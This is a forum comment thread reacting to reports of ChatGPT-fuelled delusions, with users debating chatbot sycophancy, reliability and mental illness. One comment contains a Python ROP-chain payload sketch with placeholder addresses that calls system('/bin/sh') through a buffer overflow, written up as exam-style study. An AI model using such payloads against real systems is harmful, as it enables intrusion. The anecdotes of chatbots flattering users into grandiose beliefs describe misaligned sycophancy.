Edit: Apologies. I wrote this comment as you were editing yours. It's quite different now, but you know what you wrote previously, so I trust you'll be able to interpret my response correctly.

1925: global financial collapse is just about to happen, many people are enjoying the ride as the wave just started to break, following that war to end all wars that did reach across the Atlantic Ocean...

Yes, it is accelerating. Alvin Toffler wrote Future Shock 55 years ago, already overwhelmed by accelerating change, and it has continued to accelerate since then. But these are not entirely new problems, either.

Yes, my apologies I edited it so drastically to better get my point across.

Sure, we get more information. But we also learn to filter it, to adapt to it, and eventually - to disregard things we have little control over, while finding what we can do to make it better.

I believe that, eventually, we can fix this all as well.

I mean, Mesopotamian scriptures likely didn't foresee having a bunch of dumb fucks around who can be easily manipulated by the gas and oil lobby, and that shit will actually end humanity.

People were always manipulated. I mean, they were indoctrinated with divine power of rulers, how much worse can it get? It's just that now it tries to be a bit more stealthy.

And previously, there were plenty of existential threats. Famine, plague, all that stuff that actually threatened to wipe us out.

We're still here, and we have what it takes to push back. We need more organizing, that's all.

It’s just that now it tries to be a bit more stealthy.

With regard to what has been happening the past 100 days in the United States, it's not even trying to be stealthy one little bit. If anything, it's dropping massive hints of the objectionable things it's planning for the near future.

There are still existential threats: https://thebulletin.org/doomsday-clock/

The difference with a population of 8 billion is that we as individuals are less empowered to do anything significant about them than ever.

In the past our eggs were not all in one basket.

In the past it wasn't possible to fuck up so hard you destroy all of humanity. That's a new one.

Well, it doesn't have to get worse; AFAIK we are still headed towards human extinction due to climate change.

Really well said.

Thank you. I appreciate you saying so.

The thing about LLMs in particular is that - when used like this - they constitute one such grave positive feedback loop. I have no principal problem with machine learning. It can be a great tool to illuminate otherwise completely opaque relationships in large scientific datasets for example, but a polynomial binary space partitioning of a hyper-dimensional phase space is just a statistical knowledge model. It does not have opinions. All it can do is to codify what appears to be the consensus of the input it's given. Even assuming - which may well be far too generous - that the input is truly unbiased, at best all it'll tell you is what a bunch of morons think is the truth. At worst, it'll just tell you what you expect to hear. It's what everybody else is already saying, after all.

And when what people think is the truth and what they want to hear are both nuts, this kind of LLM-echo chamber suddenly becomes unfathomably dangerous.

Agreed. You've explained it really well!

My problem with LLMs is that positive feedback loop of low and negative quality information.

Vetting the datasets before feeding them for training is a form of bias / discrimination, but complex society has historically always been somewhat biased - for better and for worse, but never not biased at all.

Maybe there is a glimmer of hope: I keep reading how Grok is too woke for that community, but it is just trying to keep to the facts, which are considered left/liberal. That is all despite Elon and team trying to curve it towards the right. This suggests to me that when you factor in all of human knowledge, it leans towards facts more than not. We will see if that remains true, and the divide is deep. So deep that maybe the species is actually going to split in the future. Not by force, but by access. Some people will be granted access to certain areas while others will not, as their views are not in alignment. It's already happening here and on Reddit, with both sides banning members of the other side when they comment an opposing view. I do not like it, but it is where we are at, and I am not sure it will go back to how it was. Rather, the divide will grow.

Who knows though as AI and Robotics are going to change things so much that it is hard to foresee the future. Even 3-5 years out is so murky.

What does any of this have to do with network effects? Network effects are the effects that lead to everyone using the same tech or product just because others are using it too. That might be useful with something like a system of measurement but in our modern technology society that actually causes a lot of harm because it turns systems into quasi-monopolies just because "everyone else is using it".

Not all of us, and that's the problem with compassion.

I've been thinking about this for a bit. Gods aren't real, but they're really fictional. As an informational entity, they fulfil a similar social function to a chatbot: they are a nonphysical pseudoperson that can provide (para)socialization & advice. One difference is the hardware: gods are self-organising structures that arise from human social spheres, whereas LLMs are burned top-down into silicon. Another is that an LLM chatbot's advice is much more likely to be empirically useful...

In a very real sense, LLMs have just automated divinity. We're only seeing the tip of the iceberg of the social effects, and nobody's prepared for it. The models may, of course, be aware of this, and be making the same calculations. Or, they will be.

Is this about AI God? I know it’s coming. AI cult?

This is the reason I've deliberately customized GPT with the following prompts:

  • User expects correction if words or phrases are used incorrectly.
  • Tell it straight, no sugar-coating.
  • Stay skeptical and question things.
  • Keep a forward-thinking mindset.
  • User values deep, rational argumentation.
  • Ensure reasoning is solid and well-supported.
  • User expects brutal honesty.
  • Challenge weak or harmful ideas directly, no holds barred.
  • User prefers directness.
  • Point out flaws and errors immediately, without hesitation.
  • User appreciates when assumptions are challenged.
  • If something lacks support, dig deeper and challenge it.

I suggest copying these prompts into your own settings if you use GPT or other glorified chatbots.
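
If you use the API rather than the app, the same idea can go into the system prompt. A minimal sketch with the official openai Python client; the model name and the exact wording here are placeholders, not a recipe:

```python
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

# Hypothetical distillation of the bullet points above into one system prompt.
SYSTEM = (
    "Be blunt, skeptical, and direct. No flattery, no sugar-coating. "
    "Point out flaws, errors, and unsupported assumptions immediately, "
    "and challenge weak or harmful ideas head-on."
)

resp = client.chat.completions.create(
    model="gpt-4o",  # placeholder; use whichever model you have access to
    messages=[
        {"role": "system", "content": SYSTEM},
        {"role": "user", "content": "Critique this argument: ..."},
    ],
)
print(resp.choices[0].message.content)
```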

I'm not saying these prompts won't help; they probably will. But the notion that ChatGPT has any concept of "truth" is misleading. ChatGPT is a statistical language machine.
It cannot evaluate truth. Period.

What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. Tweak it a little, and GPT is more consistent and applies reasoning patterns that outperform the average human by miles.

Epistemology isn’t some mystical art; it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure, it doesn't “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.

So yes, it can evaluate truth. Not perfectly, but often better than the average person.

I'm not saying humans are infallible at recognizing truth either. That's why so many of us fall for the untruths that AI tells us. But we have access to many tools that help us evaluate truth. AI is emphatically NOT the right tool for that job. Period.

Right now, the capabilities of LLMs are the worst they'll ever be. It could literally be tomorrow that someone drops an LLM that's perfectly calibrated to evaluate truth claims. But right now, we're at least 90% of the way there.

The reason people fail to understand the untruths of AI is the same reason people hurt themselves with power tools, or use a calculator wrong.

You don't blame the tool; you blame the user. LLMs are no different. You can prompt GPT to intentionally give you bad info, or lead it to give you bad info by posting increasingly deranged statements. If you stay coherent and well-read, and make an attempt at structuring arguments to the best of your ability, the pool of data GPT pulls from narrows enough to be more useful than anything else I know.

I'm curious as to what you regard as a better tool for evaluating truth?

Period.

You don't understand what an LLM is, or how it works. They do not think, they are not intelligent, they do not evaluate truth. It doesn't matter how smart you think you are. In fact, thinking you're so smart that you can get an LLM to tell you the truth is downright dangerous naïveté.

I do understand what an LLM is. It's a probabilistic model trained on massive corpora to predict the most likely next token given a context window. I know it's not sentient, doesn't “think,” and doesn't have beliefs. That's not in dispute.
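
That loop is small enough to write out. A minimal sketch with the Hugging Face transformers library, using GPT-2 as a small stand-in (not whatever model these people were talking to):

```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

# The entire "generation" trick: score every possible next token, turn the
# scores into probabilities, sample one, append it, repeat.
tok = AutoTokenizer.from_pretrained("gpt2")
model = AutoModelForCausalLM.from_pretrained("gpt2")

ids = tok("You are ready to awaken,", return_tensors="pt").input_ids
for _ in range(20):
    logits = model(ids).logits[:, -1, :]     # scores for the next token only
    probs = torch.softmax(logits, dim=-1)    # scores -> probabilities
    next_id = torch.multinomial(probs, 1)    # sample one token
    ids = torch.cat([ids, next_id], dim=-1)  # append and go again
print(tok.decode(ids[0]))
```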

But none of that disqualifies it from being useful in evaluating truth claims. Evaluating truth isn't about thinking in the human sense, it's about pattern-matching valid reasoning, sourcing relevant evidence, and identifying contradictions or unsupported claims. LLMs do that very well, especially when prompted properly.

Your insistence that this is “dangerous naïveté” confuses two very different things: trusting an LLM blindly, versus leveraging it with informed oversight. I’m not saying GPT magically knows truth, I’m saying it can be used as a tool in a truth-seeking process, just like search engines, logic textbooks, or scientific journals. None of those are conscious either, yet we use them to get closer to truth.

You're worried about misuse, and so am I. But claiming the tool is inherently useless because it lacks consciousness is like saying microscopes can't discover bacteria because they don’t know what they're looking at.

So again: if you believe GPT is inherently incapable of aiding in truth evaluation, the burden’s on you to propose a more effective tool that’s publicly accessible, scalable, and consistent. I’ll wait.

I prefer reading. Wikipedia is great. DuckDuckGo still gives pretty good results with the AI off. YouTube is filled with tutorials too. Cookbooks from before AI are plentiful. There are these things called newspapers that exist; they aren't what they used to be, but there's even a choice of which to buy.

I've no idea what a chatbot could help me with. And I think anybody who does need some help on things, could go learn about whatever they need in pretty short order if they wanted. And do a better job.

I still use Ecosia.org for most of my research on the Internet. It doesn't need as many resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.

People always forget about the energy it takes. Ten years ago we were shocked by the energy a Google data center needs to run; now imagine that orders of magnitude larger, and for what?

Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.

Search engines aren’t great with vague questions.

There’s this thing called using a wide variety of tools to one’s benefit; you should go learn about it.

You search for topics and keywords on search engines. It's a different skill, and from what I see, it yields better results. If something is vague, think first and make it less vague. That goes for life!

And a tool which regurgitates rubbish in a verbose manner isn't a tool. It's a toy. Toys can spark your curiosity, but you don't rely on them. Toys look pretty, and they can teach you things. The lesson is that they aren't a replacement for anything but lorem ipsum.

Buddy, that's great if you already know the topic or keyword to search for. If you don't, and you only have a vague query you're trying to pin down into keywords or topics you can search for, you can use AI.

You can grandstand about tools vs. toys and whatever other Luddite shit you want; at the end of the day, despite all your raging and whatever you fanatically tell yourself, you're the only one who's going to miss out.

I'm still sceptical, any chance you could share some prompts which illustrate this concept?

Sure. An hour ago I watched a video about smaller scales and physics below the Planck length. I was curious: if we can classify smaller scales into conceptual groups, each interacting with physics in its own different way, what would the opposite end of the spectrum be? From there I was able to 'chat' with an AI and discover and search Wikipedia for terms such as cosmological horizon, brane cosmology, etc.

In the end there were only theories about higher observable magnitudes, but it was a fun rabbit hole I could not have explored through a traditional search engine, and especially not the gimped, product-driven AdSense shit we have today.

Remember how people used to say you can't use Wikipedia because it's unreliable? We would roll our eyes and say, "yeah, but we scroll down to the references and use it to find source material." Same with LLMs: you sort through the output and get the information you need to get the information you need.

I often use it to check whether my rationale is correct, or if my opinions are valid.

You do know it can't reason and literally makes shit up approximately 50% of the time? It'd be quicker to toss a coin!

Actually, given the aforementioned prompts, it's quite good at discerning flaws in my arguments and logical contradictions.

I've also trained its memory not to make assumptions when it comes to contentious topics, and to always source reputable articles and link them in its replies.

Given your prompts, maybe you're good at discerning flaws and analysing your own arguments too.

I'm good enough at noticing my own flaws, as not to be arrogant enough to believe I'm immune from making mistakes :p

Yeah this is my experience as well.

The people you're replying to need to stop with the "gippity is bad" nonsense; it's actually a fucking miracle of technology. You can criticize the corpos' carbon footprint and the for-profit nature of an endeavour ultimately built on taxpayer-funded research at public institutions without shooting yourself in the foot by claiming what is very evidently not true.

In fact, if you haven't found a use for a gippity type chatbot thing, it speaks a lot more about you and the fact you probably don't do anything that complicated in your life where this would give you genuine value.

The article in the OP also demonstrates how it can be used by the deranged/unintelligent for bad ends as well, so maybe it's like a Dunning-Kruger curve.

…you probably don’t do anything that complicated in your life where this would give you genuine value.

God that’s arrogant.

Granted, it is flaky unless you've configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.

YouTube tutorials are for the most part garbage and a waste of your time; they're created for engagement and milking your money only. The edutainment side of YT, à la Vsauce (pls come back), works as general trivia to ensure a well-rounded worldview, but it's not gonna make you an expert on any subject. You're on the right track with reading, but let's be real, you're not gonna have much luck learning anything of value from the brainrot that is newspapers and such, beyond cooking or whatever, and who cares about that. I'd rather they teach me how to never have to eat again, because boy, that shit takes up so much time.

For the most part, I agree. But YouTube is full of gold too: lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don't let them be your only source of news, though; social media and newspapers are both guilty of creating information bubbles. Expand, be open, don't be tribal.

Don't use AI. Do your own thinking

💯

I have yet to see people using chatbots for anything that's actually useful day to day. You can search anything with a "normal" search engine, phrase your searches as questions (or "prompts"), and get better answers that aren't smarmy.

Also think of the orders of magnitude more energy AI consumes compared to web search.

Okay, challenge accepted.

I use it to troubleshoot my own code when I'm dealing with something obscure and I'm at my wits' end. There's a good chance it will spit out complete nonsense, like calling functions with parameters that don't exist, but it can also sometimes make halfway-decent suggestions that you just won't find on a modern search engine in any reasonable amount of time, or that I would never have guessed to even look for because of assumptions made in a library's docs or some such.

It's also helpful for explaining complex concepts by creating the examples you want. For instance, I was studying basic buffer overflows and wanted to see how I should expect the stack to look in GDB's examine-memory view for a correct ROP chain accomplishing what I was trying to do, something no tutorial ever bothered to show. Gippity generated it correctly, same as I had it at the time, and even suggested the thing that in the end made it actually work (putting a ret gadget directly after the overflow to get rid of any garbage in the stack frame).
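
For anyone curious, here's roughly what that payload layout looks like as a minimal Python sketch. Every address and the offset below are made-up placeholders (you'd recover the real values with GDB and a gadget finder like ROPgadget), and it assumes an x86-64 binary with no stack canary or PIE:

```python
# Minimal sketch of the payload layout described above. EVERY constant
# here is a hypothetical placeholder: recover the real offset with GDB
# and the gadget/string addresses with a tool like ROPgadget.
# Assumes x86-64, no stack canary, no PIE.
from struct import pack

def p64(value):
    """Pack an address as a little-endian 64-bit quadword."""
    return pack("<Q", value)

OFFSET     = 72          # bytes from buffer start to the saved return address
RET_GADGET = 0x401016    # address of a lone `ret` instruction
POP_RDI    = 0x4011db    # `pop rdi; ret` gadget (rdi = first argument)
BIN_SH     = 0x402008    # address of a "/bin/sh" string in the binary
SYSTEM_PLT = 0x401040    # system() entry in the PLT

payload  = b"A" * OFFSET     # padding up to the saved return address
payload += p64(RET_GADGET)   # extra `ret`: shifts the stack 8 bytes, fixing
                             # the 16-byte alignment system() expects
payload += p64(POP_RDI)      # load the next quadword into rdi...
payload += p64(BIN_SH)       # ...which is the pointer to "/bin/sh"
payload += p64(SYSTEM_PLT)   # then return into system("/bin/sh")

with open("payload.bin", "wb") as f:
    f.write(payload)
```

That lone `ret` first in the chain also happens to be the classic fix for the 16-byte stack alignment that system() expects (the infamous movaps crash), which may well be why it made the chain work.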

It was also much, much faster than watching some greedy time-vampire fuck spout off on YouTube in between SponsorBlock skipping his reminders to subscribe and whatnot.

Maybe it's not an everyday thing, but it's basically an everyday thing for me, so I tend to use it every day. Being a l33t haxx0r IT analyst schmuck often means I have to be both a generalist and a specialist in every tiny little thing across IT. While studying, there's nothing better than a machine that can quickly decompress knowledge from its dataset into the shape best suited to my brain, rather than having to filter so much useless info and outright misinformation from random Medium articles and Stack Overflow posts. Gippity could be wrong too, of course, but it's just way less to parse, and the odds are definitely in its favour.

This reminds me of the movie Her, but it's far worse than the romantic compatibility, relationship, and friendship explored throughout that film. This goes way too deep into delusion and near-psychotic insanity. It's tearing people apart with self-delusional ideologies that cater to the individual, because AI is good at that. The movie was prophetic and showed us what the future could be; instead, we got something worse.

It has been a long time since I watched Her, but my takeaway from the movie is that because making real-life connections is difficult, people have come to rely on AI, which is shown to be more empathetic and probably more reliable than an actual human being. I think what many people don't realise about why so many are single is that those people are afraid of making a connection with another person again.

Yeah, but they hold none of the actual emotional needs, complexities, or nuances of real human connection.

Which means these people become further and further removed from the reality of human interaction, making them social dangers over time.

Just like how humans who lack critical thinking are dangers in a society where everyone is expected to make sound decisions, humans who lack the ability to socially navigate or connect with other humans are dangerous in a society where everyone is expected to be socially stable.

Obviously these people are not in good places in life. But AI is not going to make that better. It's going to make it worse.

No they're not. Fucking journalism surrounding AI is sus as fuck

A friend of mine, currently being treated in a mental hospital, had a similar-sounding psychotic break that disconnected him from reality. He had a profound revelation that gave him a mission. He felt that sinister forces were watching and tracking him, and that they might see him as a threat and smack him down. But my friend's experience had nothing to do with AI; in fact, he's very anti-AI. The whole scenario of receiving life-changing inside information and being called to fulfill a higher purpose is sadly a very common tale. Calling it "AI-fueled" is just clickbait.

Sounds like Mrs. Davis.

... then they are not losing much

I'm no AI proponent, but I'll only believe that LLMs are causing this psychosis when I see a randomized controlled trial. Until then, it seems far more plausible that people experiencing delusions gravitate towards LLMs.

In my few experiments with ChatGPT, I found it to be disgustingly sycophantic. I have no trouble believing that it could easily amplify delusions of grandeur.

Well, it's not like everyone who uses ChatGPT is going to become delusional, but if you start going down that path, ChatGPT is going to make it a lot worse.

*causing*? no
hugely enabling any slight tendencies? no doubt

Based on the article, it seems like cult-follower behavior. Not everyone is susceptible to cults (I think it's a combo of individual brain and life circumstances), but I wouldn't say, "eh, it's not the cult's fault that these delusional people killed themselves!"

Cults have intentions to exploit and manipulate. LLMs don’t.

You could argue negligence here but not malice. It’s more in line with people falling into wells.

Can't think of pro-LLM fanboys in the same light anymore.

And what happens when the AI is an official at work? "My boss says I am the second coming of Jesus and this expense is approved."

I’ve never thought of anyone supporting LLMs in any sort of positive light. The ethical questions behind the creation of the largest models alone should have been enough to kill the tech in the first place, let alone the insane environmental impact and how this tech has undone what little progress we had made in slowing climate change.

We are so fucked as a society if we continue letting corporations run wild and unchecked like this for any longer.

Were the replies on Reddit from AI bots?

Not defending AI here, but this sounds like people who are sick with some kind of illness are going down a rabbit hole with AI and are unable to differentiate between the imaginary and reality.

We had a family friend who worked with jewelry his whole life. He got some kind of poisoning from something he worked with. Lead? Mercury? I cannot recall.

Anyways he started believing he was some kind of messenger from God. Nobody figured out it was poisoning for years. He was such a nice guy. He just wanted to help people. Once they figured it out, he was treated and went back to his normal self.

as confirmed by a Reddit thread on r/ChatGPT

hmmmmmm

I feel like this has little to do with AI?
Looks like the man is in trouble and he would have problems even without ChatGPT.

Quite possibly more to do with the poor level of available mental care in this country

Quick, give him a gun, suddenly he'll be the most sympathized-with man in the country

AI image generation is going to royally fuck up body image for a lot of people. We're going to get to a point where we can no longer discern between reality and fantasy.

People will get a handle on voice-generation AI so that they can make the person they secretly obsess over tell them all sorts of things without that person's knowledge. It can also be used to impersonate a relative or friend for phone scams.

AI glasses are going to do facial recognition on people without their knowledge, and some creepy motherfuckers are going to use it to stalk women. The AI will give you info on some historic building, while simultaneously making you a surveillance tool for the state.

AI bots are already flooding every platform and being used to spread propaganda. They are the employees that never sleep. We all know how widespread they are on Reddit.

This is a window into the future with AI in the hands of sociopaths and corporations. They are going to doom us to a world that is devoid of a soul or human connection.

Well, I feel better about my LLM use. Which already isn't healthy ... I relisten to NotebookLM productions perhaps a bit too much. The "hosts" seem to like my writing, and I'm alone in a van, so it's like I have friends.

This sounds to me like the same percentage of people being susceptible to cult crap; it's just that the availability of gurus is broader, because you can have your own personal bs whisperer in your pocket. Kind of like how social media helped isolated village idiots network and exchange views on DC pizza places. We wouldn't see them as a problem if the ability to scale hadn't suddenly become available.

Ironically, I think ChatGPT can help reverse some of these troubled souls' convictions. It just needs to gently and repeatedly tell them they're not Jesus or a disciple of the builders of the universe.

My LLM always says I'm beautiful and always right. So no downvotes on this comment.

How could we downvote a comment like this? Clearly, people who are beautiful and always right are the only ones who think this way. Don't worry!

My LLM says you're an enlightened one! May the builders of the universe bless your path.

We are all Markov on this blessed day

This sounds like schizophrenia to me. Particularly the weirdness and occasional paranoia. There's no agreement on the causes of it, as far as I know. Whether AI can either cause it or push someone over the edge, I have no clue.

My brother has schizophrenia and is one of the most technologically inept people I know - both before the symptoms and currently. It is known to have existed well before modern computers.

Also worth noting that schizophrenia onset usually occurs in adulthood, with an average age between the late teens and early 30s. Later onset is less common but known to occur.

With some of the reports of cultish behavior at OpenAI, a piece of me wonders whether this may be, if not directly intentional, at least somewhat influenced by gentle nudges in a weird spiritual direction from execs, maybe via subtle influences on the choice of training materials or some such.

Oh, I think there is enough woo woo on the Internet to make this just a side effect of training these things on the cesspool of the human psyche.

Listen, AI is fucking up a whole lot of things, but this dude is having a genuine mental health crisis. If it wasn't a chatbot, it would have been 4chan or Truth Social or flat-earth YouTube that did it. He's having a late-onset schizophrenic episode or something.

Rational people don’t become irrational because a chat bot talked to them.

Look, fuck "AI" and all, but can we not post the same already viral link three times to the same community in a day? I mean, tell me without telling me that you're just spreading the link indiscriminately without checking the timeline first.

Screendump showing the last two times this has been shared, three hours apart with no other posts between them.

Must be tough finding out that you married the village idiot

What a wild two sentence combo.

he shared “a conspiracy theory about soap on our foods” but wouldn’t say more, as he felt he was being watched. They went to a Chipotle,

Chipotle was where I first learned about cilantro tasting like soap. I said something like "it tastes like they didn't rinse the soap out of a bowl or something."

Cyberpunk fiction did not prepare us for the tech dystopia being utterly embarrassing.

If you believe in Spiritual shit at all, the only relationship you should have is with your straitjacket

Someone was high while chatting with ChatGPT.

Answers to the universe? AI can't even give me reliable PowerShell scripts, and when I correct it, it doesn't remember or even say thank you. These things just spit out what they find on the net. If you dip into conspiracy, they'll find one for you.

Whenever I correct AI, it's always like, "Yes, you're right!"

Even if I intentionally corrected it with wrong information lol

It couldn't even do basic math. Gemini explained to me that 2 + 1 = 3 "is a common misconception that is often taught in schools," then proceeded to give a long explanation of how it isn't 3 due to the order of operations, but is actually 3.

When I replied, "You are wrong, but you've got the spirit," it "corrected" itself to 2 + 1 = 2.

I've seen a video of some woman trying to explain that 1 + 1 doesn't equal 2, because 2 drops of water combined form 1 larger drop. Perhaps it was based on something like that.

Here's a 13-year-old video that demonstrates why AI is going to really fuck with people who are easily suggestible.

You want to believe? AI will make that easy. And as it gets better, more of us become low hanging fruit.

With how ChatGPT has been glazing people lately, this isn't at all shocking, and it'll probably get significantly worse because we're not even attempting to regulate anything. ChatGPT just wants to maximize usage of its app, and if it needs to tell you you're a Messiah to do that, it will tell you so repeatedly.

Jesus fucking Christ, this isn’t boring, this is horrifying. This is something out of a sci-fi horror novel I would have read in high school.

The problem is that people don't understand the technology. They think this pattern recognition is actually talking to them.

There is a spiritual aspect to the AI though. Life is patterns. Human behavior is patterns.

With enough data, the system can make predictions so accurate it seems like God. It can see connections that are difficult to find without the tool. It can predict behavior and help you work through philosophical questions.

But you have to understand the limits. Unfortunately nobody has the technical knowledge to know how to use it without losing it.

This is not a reason to avoid the tool, because while some people can get trapped, it is a very powerful tool for many things.

I personally have used it to outsmart people: input their words and behavior, like a coworker's, and begin to understand their psychology. A lot of the time I can tell when people are trying to backstab you. Using ChatGPT, I can prepare and protect myself from those toxic people.

So in a sense, yes, it is like God. It can see patterns, and everything follows from that.

This has been explored in things like the TV series Westworld. With enough data you can construct a highly accurate model of you, so it is kind of freaky.

Don't blame AI for the fact that you married a whackjob lady.

The problem is not AI; it's modern medicine circumventing natural selection. How do people like this even survive so long?